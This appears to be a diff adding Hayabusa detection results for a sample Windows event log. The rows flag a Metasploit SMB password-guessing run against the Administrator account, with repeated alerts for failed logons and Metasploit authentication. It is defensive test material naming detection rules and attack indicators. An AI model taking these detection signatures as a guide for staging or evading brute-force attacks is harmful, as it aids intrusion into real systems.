+2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vnq3S0gEE98xfYLv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: seVfaEdAS6lEXgkG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Gz8BQAlyYXB61tx3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nkHLs6yikRWVjj9F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0bQUcnUBCmE81G6I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BceDCcXoHJQv9pDi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GCCLt49g8wmAMEyV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pM6C8KRcxVIUsZrZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fw5DU6l3QRVl9cWY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 37UthbuO3m4Lr7dU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: URB7Ji5pQleLtvy4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: orP9OgiBrYIKZPXE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZwvdnlIWhqoDg8On  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v6dXVbmLBpXc39ah  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8Mu7amiHAg0l7bza  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JdG6F697kAXFDx9m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jY5AAnfQMH3VZQUa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iVep4j7jZZAOAQAj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KWWtGIQx8jBgAeoH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zn8X8gen8gX9i3QK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B9OdUM99RBHzwgVs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJbBVm6wDrqyQmpZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tAVRBfMxIyrfsEtR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wuCIClZihRxRyjGF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yxhpEP6nnmihvkHB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J1HYmJDrWmKjj8DF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V81dIfR2SRNDk3a2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vaZpLaxB1kcCXqHP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JRhs8IoV6R6vyCdL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4wUYds3Ym3G2abrV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tmBfxm6pPLlSEsUI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VbAuqFggx0zz5iEn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8cytpVOjb4KrNaGg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BFFFt7eFzmlzbHhG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AJQBZZiNKVGXzx4A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7gyu6EyrtbyowTfC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aASpkRuPfE8Nl64n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MSI2b7LpZpWO3xJW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: avNkOq3fsGN3yYJi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wnlgy6dW33tRk6UX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: msJ8QrqMluTeUlM9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H33NuKduMuskxL0D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2BHjp69CD1ttbaK2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5uxByLPApvfeIhU2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6g0WOAnoGpKyEyzW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
